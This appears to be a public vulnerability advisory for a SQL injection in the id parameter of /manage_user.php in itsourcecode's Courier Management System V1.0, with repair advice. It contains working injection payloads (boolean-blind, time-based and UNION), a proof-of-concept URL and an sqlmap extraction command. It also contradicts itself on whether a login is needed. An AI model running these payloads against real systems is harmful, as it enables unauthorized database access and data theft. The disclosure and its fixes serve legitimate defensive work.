SQL Injection Vulnerability in itsourcecode Courier Management System V1.0

BUG_Author: liuhanzhi Affected Version: V1.0 Vendor: itsourcecode Software: Courier Management System Vulnerability File:

  • /manage_user.php

Description

1. SQL Injection via id Parameter

In the file /manage_user.php, the application directly concatenates the user-supplied id parameter into an SQL query without any sanitization or validation.

Vulnerable code (line 5):

$user = $conn->query("SELECT * FROM users where id =".$_GET['id']);

2. Exploiting the SQL Injection

By injecting malicious SQL commands into the id parameter via a GET request, an attacker can manipulate the underlying SQL query to perform unauthorized database operations including data extraction, modification, and enumeration.

3. Example SQL Injection Payloads

Boolean-based blind:

id=(SELECT (CASE WHEN (1679=1679) THEN 1 ELSE (SELECT 2926 UNION SELECT 3592) END))

Time-based blind:

id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs)

UNION query (8 columns):

id=-7753 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7a71,0x75426f454f47726f6659416e4d424474484a69636e4569694d674b6c4c47705145566572516f4c53,0x7171627871),NULL,NULL,NULL,NULL-- -

4. Requesting the Vulnerable Endpoint

Send a GET request to the vulnerable endpoint:

http://<target-ip>/manage_user.php?id=1

5. Verifying the Exploit with sqlmap

sqlmap --random-agent --batch \
  -u "http://<target-ip>/manage_user.php?id=1" \
  --dbms=mysql \
  --current-db

The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:

Proof of Concept

  1. No login required. Access the vulnerable endpoint directly without any credentials:
http://<target-ip>/manage_user.php?id=1
  1. Inject the time-based payload to verify the vulnerability (page will delay 5 seconds):
http://<target-ip>/manage_user.php?id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs)
  1. Run sqlmap to confirm and extract data:
sqlmap --random-agent --batch \
  -u "http://<target-ip>/manage_user.php?id=1" \
  --dbms=mysql \
  --current-db

Root Cause

A SQL injection vulnerability was found in the /manage_user.php file of the “Courier Management System Project In PHP”. The reason for this issue is that attackers can inject malicious code from the parameter id after logging in with valid credentials. The application fails to properly sanitize or validate this input before using it in SQL queries. This allows attackers to manipulate SQL queries and perform unauthorized operations.

Impact

Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

Suggested Repair

  1. Use Prepared Statements and Parameter Binding: Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

    $stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$user = $stmt->get_result();

  2. Input Validation and Filtering: Strictly validate and filter user input data to ensure it conforms to the expected format. For example, ensure that IDs match a valid numeric pattern.

    $id = intval($_GET['id']);

  3. Minimize Database User Permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as root or admin) for daily operations.